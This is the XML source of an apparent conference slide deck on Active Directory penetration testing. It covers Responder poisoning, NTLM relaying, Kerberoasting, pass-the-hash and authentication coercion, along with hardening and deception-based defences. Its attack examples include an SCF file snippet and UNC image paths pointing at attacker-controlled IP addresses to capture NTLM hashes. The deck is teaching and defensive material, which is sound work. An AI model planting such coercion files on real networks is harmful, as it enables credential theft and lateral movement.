          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IconFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\\192.168.12.3\share.ico</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Taskbar]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ToggleDesktop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7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024C-602A-ABBF-563E-19B26C97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Outlook Tracking Pixel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E4356-5B5E-696B-FF71-D134AA6E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2" y="1607417"/>
            <a:ext cx="10871868" cy="4885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00BD8E-1F86-7D29-A259-C2E6A6593965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422153" y="5302282"/>
            <a:ext cx="6139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1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"\\172.27.94.50\a.png"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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0D1C7C4-9ED6-E500-3CC6-97112FA4877E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257848" y="5324521"/>
            <a:ext cx="3164305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62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3D6B-A9ED-413F-B9C4-8BD74E05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 err="1"/>
              <a:t>Whomai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6E33DC-2CF4-4276-8A72-717861512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sz="2400" dirty="0"/>
              <a:t>Qasim Ijaz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Director of Offensive Security at Blue Bastion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Former roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sr. Manager Attack Simulation at a Healthcare Org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HIPAA/HITRUST Assessor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Associate CISO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Instructor in after-hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blackhat, BSides, OSCP Bootcamp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Focus areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Dry” business side of hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Healthcare security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55889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F597-E861-9B47-9E25-1CEDAF2C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the Hash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3578B-E854-C6C1-C2B7-FCB3A434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" y="1866515"/>
            <a:ext cx="10045148" cy="3874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57794-224D-8B1B-6A38-197FD6C1ADF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3072548" y="5825671"/>
            <a:ext cx="6144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Hashcat on RTX 3080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Laptop cracks this hash at 3037.3 MH/s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236906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E9E-9582-5911-C2C6-BCCB5BF6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Hunting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0EF3C-F2AE-7A61-4466-EB8D3A5F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5" y="1343252"/>
            <a:ext cx="7102207" cy="2351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BC503-27DA-B48E-D3B7-E65276B4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608" y="3362595"/>
            <a:ext cx="7102207" cy="1908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EA30C-4CE7-C0A2-FCBF-6378A3DB5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172" y="4113709"/>
            <a:ext cx="2914828" cy="18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5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9A6C-7ED2-46A6-AE43-FBE738E4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Active Directory Trusts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E17FE0-2CA3-4254-D62B-6833A79F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01" y="1652926"/>
            <a:ext cx="9821143" cy="9191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forest is the security boundary.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Parent and child domain have a default two-way trust.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Forest/Domain trusts can have transitive properties.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93238843-C1FE-02B5-1D74-40B9A065B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82397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="3103182"/>
          <a:ext cx="5580185" cy="343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E094152C-695C-0353-CB7D-63C3403C4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536779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="249116" y="2978489"/>
          <a:ext cx="5580185" cy="369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4111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8282"/>
            <a:ext cx="12192000" cy="4946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EB7F9F-6B22-F6CB-26AC-48AF35C4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Secure Hardening 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Active Directory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55DF02-5657-2A28-888A-441049EA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Feature | Vulnerability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89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D956-EEE2-7D43-283E-994346CD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and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04BF1-0D93-4EC4-A4F4-0FF2EE7E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3892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Do you really need that may domain/enterprise admins?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Does every domain admin really need to be an enterprise admin?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain/Enterprise admins should never logon to non-DC devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Don’t run services as with DA privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use Protected Users Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use LAPS for local admin management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E702-8A69-2F8E-2250-54B1BE65676D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3227121" y="5324454"/>
            <a:ext cx="4337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Use Deception</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168431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D956-EEE2-7D43-283E-994346CD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Deception to Detect Adversaries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04BF1-0D93-4EC4-A4F4-0FF2EE7E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248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Create honeypot users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reset password periodically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logon to honeypot domain-joined AD device periodically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Give a Service Principal Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have a honeypot user periodically send out NBNS/LLMNR/mDNS requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>https://github.com/bhdresh/Dejavu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>https://github.com/samratashok/Deploy-Deception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>https://github.com/tolgadevsec/Awesome-Deception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6858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D956-EEE2-7D43-283E-994346CD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Bloodhound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04BF1-0D93-4EC4-A4F4-0FF2EE7E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1042" cy="336389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Provides visual graphs of relationships between AD objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., Possible paths to domain admin group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., What rights user A has on Group B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SharpHound </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Collector” script that queries Active Directory for data Bloodhound ingests </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C# and PowerShell versions available </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Requires Neo4j graphing database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11384-81F1-56A4-0C24-301C0BBD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242" y="664646"/>
            <a:ext cx="6001588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D956-EEE2-7D43-283E-994346CD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Bloodhound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AF7FF-A248-2A9D-4EDC-4A3330B24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94" y="1517012"/>
            <a:ext cx="7858951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53B24C-BC5A-DF56-DCE8-B17AA546F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" y="843085"/>
            <a:ext cx="7626927" cy="2387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CB5811-21F8-5EB0-0EB4-310756141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8" y="3322760"/>
            <a:ext cx="7626927" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Qasim Ijaz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Blue Bastion Security | A division of Ideal Integrations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bluebastion.net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271EB-C244-71AB-D22B-19CAF9FCB109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058896" y="5551116"/>
            <a:ext cx="5084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https://www.linkedin.com/in/qasimijaz/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97757-588D-242D-6251-F1B13897F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296" y="2295298"/>
            <a:ext cx="3255818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8282"/>
            <a:ext cx="12192000" cy="4946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EB7F9F-6B22-F6CB-26AC-48AF35C4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Initial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55DF02-5657-2A28-888A-441049EA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I’ll just let myself in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern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5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768A8AD-87A4-7781-48DF-4387D13A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(Broad|Multi)cast Name Resolution Protocols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583E69E-4D4E-1FF2-1A39-F3EE3DF0B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2166" y="2252635"/>
            <a:ext cx="1577419" cy="15774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CCBD05-6F9D-5D68-5320-874D074D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24613" y="2011465"/>
            <a:ext cx="1577419" cy="1590675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3DD83F5B-35C5-BDC7-6A74-A93BAD3DC79B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636575" y="2175908"/>
            <a:ext cx="25095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1a: Where is \\HRShhare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A116830B-9C38-CF39-A969-D66D3782687E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399111" y="3747107"/>
            <a:ext cx="48040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1b: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broad|Multicsat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] Anyone know \\HRShhare?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D55F8C62-67EE-363C-643E-6351051AD41B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827731" y="5835575"/>
            <a:ext cx="42227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3: Great. Let’s authenticate using NetNTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and then I got some business with ya!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2944FD26-7407-F4BC-1473-71EE4992BAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610642" y="3652236"/>
            <a:ext cx="6158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User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78BE7077-E749-448C-CD77-94B0E22B202C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189859" y="5994990"/>
            <a:ext cx="14027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HR File Share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82C8D107-7A61-9AFA-5B4D-02EC2FD5C572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9015013" y="3586014"/>
            <a:ext cx="21595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 Name Server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05BAE0A8-946A-3AF2-B97F-4CA96F58240F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2374813" y="4006414"/>
            <a:ext cx="3374469" cy="1405734"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10000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907E303D-13D4-AC1B-E98C-2BEDFE8669E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1945989" y="4006414"/>
            <a:ext cx="3557305" cy="1809927"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 445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5A21F3-73C4-8194-A872-DF2EE7B447BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940774" y="3591516"/>
            <a:ext cx="1355889" cy="3111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7307C2-A556-6301-1659-AA2B01459E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940774" y="3614409"/>
            <a:ext cx="1224700" cy="4893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C32A19-8AB2-45BB-3DC0-34B9E1D91FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940774" y="3591514"/>
            <a:ext cx="1459584" cy="1555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9BC60F-26BF-CB84-5DBF-724DB7946167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940774" y="3614409"/>
            <a:ext cx="1029514" cy="59659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F0A887-A65D-D270-0011-B77DC86259C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071178" y="2545240"/>
            <a:ext cx="50716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C77276E-01AB-AD32-0C06-0EF77C203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59322" y="4847182"/>
            <a:ext cx="1138243" cy="1147808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CAF718CD-4FD5-D292-C88C-78E0BC7ED7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498989" y="5000942"/>
            <a:ext cx="19257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2: I am \\HR-Share</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407229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9F3566-4FD7-55AE-0A57-A67FDC8B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Poisoning (Broad|Multi)cast Name Resolution - Responder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2BECE-F07A-A744-65AB-12CF37C7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5" y="1910616"/>
            <a:ext cx="5252937" cy="2938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95F5D2-0B83-D99B-FB7C-E2A941F5D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74"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430290" y="2549794"/>
            <a:ext cx="6132465" cy="31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7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4CFD-2702-B69C-0B97-D073D924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Relaying NetNTLM Hashes - No SMB Signing</a:t>
            </a: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7027450-C0CF-AAAB-ACA5-7AD4D7547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31"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261420" y="1460166"/>
            <a:ext cx="11769476" cy="227363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8CAA52C-07EF-DD0A-BC1C-331740765E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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261420" y="2680855"/>
            <a:ext cx="11769476" cy="39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DC4A-F7C1-97A8-B357-99594151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Hardening against Responder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8BBE1-2B7E-CDC7-9351-E1877D394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Disable NetBIOS Name Resolution (NBNS), mDNS, and LLMNR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable WPAD and create a DNS entry to resolve it to 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce (not just enable) SMB Signing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Periodically scan for any deviation from this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap, Nessus, Nexpose, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default in coming Windows 11 versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deception! Create a fake user that sends out broadcast/multicast name resolution requests. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388770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FC3D-765C-F816-EC58-03D36B5B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Kerberos in a Nutshell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F2AC2-B261-1F2D-77E1-9A536835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2" y="1283005"/>
            <a:ext cx="7937025" cy="53325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FA3B55-8751-280C-F203-459B48C5D4EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="3678382"/>
            <a:ext cx="7273636" cy="2923309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09024B-AA53-2FCD-3218-FB703961B365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472055" y="3165764"/>
            <a:ext cx="338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Ticket Granting Service (TGS) Ticket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Obtained by presenting a valid TGT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Authenticates us to an individual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Encrypted with the NT hash of account that owns destination service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15D5FA-808A-CABF-FB64-B550B15E8F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7225145" y="4052455"/>
            <a:ext cx="1399310" cy="449353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ED5D50-EAEC-DC9E-1504-20479DAAECF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6449291" y="4610826"/>
            <a:ext cx="2175164" cy="734291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F202F-DBBC-D358-9805-68112BB08F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2168236"/>
            <a:ext cx="6172200" cy="146165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CE00DA-F7B4-86D2-F93F-2849317836CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8395855" y="1579418"/>
            <a:ext cx="3387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Ticket Granting Ticket (TGT)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Authenticates us to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Encrypted with KRBTGT’s NT Hash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DAA21B-FE2F-C592-438E-7E69FD415875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770418" y="2318082"/>
            <a:ext cx="2625437" cy="37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5BEDF6-A291-0F5A-D1EE-71D0C9F19AA4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1378178" y="2368582"/>
              <a:ext cx="2223360" cy="14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5BEDF6-A291-0F5A-D1EE-71D0C9F19A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4538" y="2260942"/>
                <a:ext cx="2331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C1E662-FDEC-630E-EF69-9D7405602DDE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1337498" y="3872302"/>
              <a:ext cx="2819160" cy="48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C1E662-FDEC-630E-EF69-9D7405602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3858" y="3764302"/>
                <a:ext cx="2926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0EC97E-2006-3F49-F917-3153B04604EE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1329938" y="5430742"/>
              <a:ext cx="3033720" cy="14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0EC97E-2006-3F49-F917-3153B04604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5938" y="5322742"/>
                <a:ext cx="314136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9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FB12B25-EC74-381B-BFD0-EC220FAE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4" y="1552368"/>
            <a:ext cx="3374963" cy="830522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting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F746A4D-BCA3-9C68-5FC9-6F1D3DF9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9" y="2290587"/>
            <a:ext cx="3829792" cy="227682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Any authenticated AD user can request a Service Ticket (TGS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>TGS is encrypted with the service account’s NT hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>You can crack that TGS offline to get the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="17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160C77-B361-0B42-1070-43339C88C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71" y="0"/>
            <a:ext cx="8186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Words>1125</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>187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Office Theme</vt:lpstr>
      <vt:lpstr>Feature or a Vulnerability? Tales of an Active Directory Pentest</vt:lpstr>
      <vt:lpstr>Whomai?</vt:lpstr>
      <vt:lpstr>Initial Access</vt:lpstr>
      <vt:lpstr>(Broad|Multi)cast Name Resolution Protocols</vt:lpstr>
      <vt:lpstr>Poisoning (Broad|Multi)cast Name Resolution - Responder</vt:lpstr>
      <vt:lpstr>Relaying NetNTLM Hashes - No SMB Signing</vt:lpstr>
      <vt:lpstr>Hardening against Responder</vt:lpstr>
      <vt:lpstr>Kerberos in a Nutshell</vt:lpstr>
      <vt:lpstr>Kerberoasting</vt:lpstr>
      <vt:lpstr>Mitigating Kerberoasting</vt:lpstr>
      <vt:lpstr>Lateral Movement</vt:lpstr>
      <vt:lpstr>Pass The Hash vs Over-Pass the Hash</vt:lpstr>
      <vt:lpstr>Pass the Ticket</vt:lpstr>
      <vt:lpstr>Detecting Lateral Movement</vt:lpstr>
      <vt:lpstr>Domain Escalation</vt:lpstr>
      <vt:lpstr>Improper Access / Privileges</vt:lpstr>
      <vt:lpstr>Authentication Coercion| Ask Nicely</vt:lpstr>
      <vt:lpstr>SCF, URL, LNK Files</vt:lpstr>
      <vt:lpstr>Outlook Tracking Pixel</vt:lpstr>
      <vt:lpstr>Capturing the Hash</vt:lpstr>
      <vt:lpstr>Share Hunting</vt:lpstr>
      <vt:lpstr>Active Directory Trusts</vt:lpstr>
      <vt:lpstr>Secure Hardening  Active Directory</vt:lpstr>
      <vt:lpstr>Detection and Defense</vt:lpstr>
      <vt:lpstr>Use Deception to Detect Adversaries</vt:lpstr>
      <vt:lpstr>Use Bloodhound </vt:lpstr>
      <vt:lpstr>Use Bloodhound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Penetration Testing Bootcamp</dc:title>
  <dc:creator>Qasim Ijaz</dc:creator>
  <cp:lastModifiedBy>Qasim Ijaz</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-22T23:52:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-09T20:35:45Z</dcterms:modified>
</cp:coreProperties>
</file>